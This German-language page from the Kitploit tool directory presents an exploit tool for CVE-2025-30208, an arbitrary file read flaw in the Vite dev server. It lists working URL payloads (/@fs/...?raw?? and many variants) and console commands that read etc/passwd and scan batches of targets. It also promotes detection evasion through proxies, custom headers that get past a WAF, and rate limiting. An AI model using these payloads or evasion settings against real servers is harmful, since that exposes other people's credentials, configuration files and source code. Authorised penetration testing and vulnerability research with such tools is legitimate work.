Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

FeedsKontaktDatenschutz© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-30208 — CVE‑2025‑30208 ist eine Sicherheitslücke mittlerer Schwere, die beliebiges Lesen von Dateien im Vite-Entwicklungsserver (einem beliebten Frontend-Build-Tool) ermöglicht. | Kitploit
Tools/GitHubGitHub/themehackers/cve-2025-30208
SchwachstellenscannerPayload-GenerierungExploitationInformationsbeschaffungWebsicherheitPenetrationstests
GitHubthemehackers/cve-2025-30208

CVE-2025-30208

CVE‑2025‑30208 ist eine Sicherheitslücke mittlerer Schwere, die beliebiges Lesen von Dateien im Vite-Entwicklungsserver (einem beliebten Frontend-Build-Tool) ermöglicht.

Repository anzeigen
1014vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

🔥 CVE-2025-30208 Vite-Scanner für die „Arbitrary File Read“-Schwachstelle

Python License Security Status Modular

Fortschrittlicher Schwachstellenscanner für CVE-2025-30208 mit Enterprise-Funktionen

Professionelles Penetrationstest-Tool zur Erkennung der Vite-Schwachstelle „Arbitrary File Read“

🚀 Schnellstart • 📋 Funktionen • 🔧 Verwendung • 📊 Beispiele • 🛡️ Sicherheit


📖 Übersicht

Dies ist ein umfassender Schwachstellenscanner, der entwickelt wurde, um die Schwachstelle CVE-2025-30208 in Vite-Entwicklungsservern zu erkennen und auszunutzen. Die Schwachstelle ermöglicht den beliebigen Lesezugriff auf Dateien (Arbitrary File Read) über die Dateisystem-Endpunkte von Vite und kann potenziell sensible Konfigurationsdateien, Quellcode und Systeminformationen offenlegen.

🎯 Was dieses Tool tut

  • Erkennt verwundbare Vite-Instanzen in Netzwerken
  • Nutzt die Schwachstelle „Arbitrary File Read“ sicher aus
  • Findet sensible Dateien und Konfigurationsdaten
  • Meldet Ergebnisse in mehreren Formaten (HTML, JSON, Konsole)
  • Verwaltet Scan-Sitzungen und Konfigurationen
  • Behandelt Fehler elegant mit automatischen Wiederholungsmechanismen

🏗️ Modulare Architektur

Das Tool verfügt nun über eine modulare Architektur für bessere Wartbarkeit und Erweiterbarkeit:

  • CVE-2025-30208.py - Haupt-Scanner-Anwendung
  • payloads.py - Fortschrittliche Exploit-Payloads (60+ Variationen)
  • sensitive_files.py - Umfassende Datenbank sensibler Dateien (200+ Dateien)
  • html_template.py - Erweitertes HTML-Reporting-Template im Hacker-Stil

🚀 Schnellstart

Voraussetzungen

pip3 install -r requirements.txt

Grundlegende Verwendung

python3 CVE-2025-30208.py

CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run

📋 Funktionen

🔍 Kernfunktionen der Schwachstellenerkennung

  • 60+ Fortschrittliche Payloads: Umfassende Exploitation-Techniken für maximale Erkennung
  • Intelligente Erkennung: Analyse der Antworten zur Vermeidung von Fehlalarmen
  • Echtzeit-Validierung: Kontinuierliche Validierung der Zielantworten
  • Umfassende Tests: Testet alle bekannten verwundbaren Endpunkte

🛡️ Erweiterte Sicherheitsfunktionen

  • Proxy-Unterstützung: HTTP/HTTPS-Proxy-Konfiguration für Anonymität
  • Benutzerdefinierte Header: WAF/IPS mit benutzerdefinierten HTTP-Headern umgehen
  • Ratenbegrenzung: Konfigurierbare Verzögerungen zur Vermeidung der Erkennung
  • Sitzungsverwaltung: Scan-Sitzungen speichern und wiederherstellen
  • Eingabevalidierung: Umfassende Parametervalidierung

🔧 Erweiterte Fähigkeiten

  • Stapel-Scanning: Multithreaded-Scanning mehrerer Ziele
  • Erkennung sensibler Dateien: Automatische Erkennung von 200+ sensiblen Dateien
  • Konnektivitätstests: TCP/UDP/HTTP/HTTPS-Protokolltests
  • Fehlerbehebung: Automatische Wiederholung mit exponentiellem Backoff
  • Umfassende Protokollierung: Detaillierte Logs mit Zeitstempeln

📊 Berichte & Ausgabe

  • 🎨 Erweiterte HTML-Berichte: Ansprechende Schwachstellenberichte im Hacker-Stil mit Animationen
  • JSON-Export: Strukturierte Daten für weitere Analysen
  • Konsolenausgabe: Farbcodiertes Echtzeit-Feedback
  • Logdateien: Detaillierte Audit-Protokolle
  • Interaktive Webschnittstelle: Integrierter Webserver zum Anzeigen von Berichten

🔧 Verwendungsanleitung

1. Grundkonfiguration

CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > set FILEPATH etc/passwd

CVE-2025-30208 > test

2. Schwachstellentest

CVE-2025-30208 > run

# Enable verbose mode for detailed output
CVE-2025-30208 > verbose
CVE-2025-30208 > run

3. Stapel-Scanning

CVE-2025-30208 > set THREADS 10
CVE-2025-30208 > batch

192.168.1.100:3000
192.168.1.101:3000
192.168.1.102:3000
[Press Enter twice to finish]

4. Erkennung sensibler Dateien

CVE-2025-30208 > scan

5. Erweiterte Konfiguration

# Configure proxy
CVE-2025-30208 > proxy
Enter proxy: http://127.0.0.1:8080

# Set custom headers
CVE-2025-30208 > headers
Enter headers: {"User-Agent": "Custom Scanner"}

# Configure rate limiting
CVE-2025-30208 > rate
Enter rate limit: 1.0

6. Erweitertes HTML-Reporting

# Generate beautiful HTML report
CVE-2025-30208 > pull

# Start web server to view report
CVE-2025-30208 > web

# Start web server on specific port
CVE-2025-30208 > web 8081

# Stop web server
CVE-2025-30208 > web off

📊 Befehlsreferenz

BefehlBeschreibungBeispiel
set <option> <value>Konfigurationsoptionen festlegenset RHOST 192.168.1.100
show optionsAktuelle Einstellungen anzeigenshow options
editInteraktiver Optionseditoredit
run / exploitSchwachstellentest ausführenrun
batchMehrere Ziele im Stapel scannenbatch
scanSensible Dateien findenscan
pullErgebnisse nach HTML/JSON exportierenpull
web [on|off|port]Webserver für HTML-Berichteweb 8080
saveSitzungskonfiguration speichernsave
loadSitzungskonfiguration ladenload
testKonnektivität zum Ziel testentest
validateAktuelle Konfiguration validierenvalidate
verboseAusführlichen Modus umschaltenverbose
proxyProxy-Einstellungen konfigurierenproxy
headersBenutzerdefinierte HTTP-Header festlegenheaders
rateRatenbegrenzung konfigurierenrate
logProtokollinformationen anzeigenlog
help / ?Hilfe anzeigenhelp
exit / quitTool beendenexit

⚙️ Konfigurationsoptionen

OptionBeschreibungStandardValidierung
RHOSTZiel-Host/IP-Adresse-Hostname/IP-Validierung
RPORTZiel-Portnummer-Portbereich (1-65535)
FILEPATHZu testender Dateipfadetc/passwdPfadvalidierung
PROXYHTTP/HTTPS-Proxy-URL-URL-Formatvalidierung
VERBOSEAusführliche Ausgabe aktivierenfalseBoolesche Validierung
RATE_LIMITVerzögerung zwischen Anfragen (Sekunden)0.3Numerische Validierung
THREADSAnzahl der Threads für Stapel-Scanning5Ganzzahl-Validierung
TIMEOUTAnfrage-Timeout (Sekunden)5Ganzzahl-Validierung
CUSTOM_HEADERSBenutzerdefinierte HTTP-Header (JSON){}JSON-Formatvalidierung

🎨 Erweitertes Payload-System

Der Scanner verwendet nun 60+ verschiedene Payload-Varianten, die in payloads.py organisiert sind:

Primäre @fs-Payloads

/@fs/{file_path}?raw??
/@fs/{file_path}?raw&url
/@fs/{file_path}?import&raw??
/@fs/{file_path}?raw&import
/@fs/{file_path}?import&url

Erweiterte Parameter-Variationen

/@fs/{file_path}?raw&source
/@fs/{file_path}?raw&content
/@fs/{file_path}?raw&data
/@fs/{file_path}?raw&file
/@fs/{file_path}?raw&type=text
/@fs/{file_path}?raw&format=text
/@fs/{file_path}?raw&encoding=utf8

Vite-spezifische Variationen

/@fs/{file_path}?raw&vite&dev
/@fs/{file_path}?raw&vite&hot
/@fs/{file_path}?raw&vite&hmr
/@fs/{file_path}?raw&development
/@fs/{file_path}?raw&debug
Tool herunterladen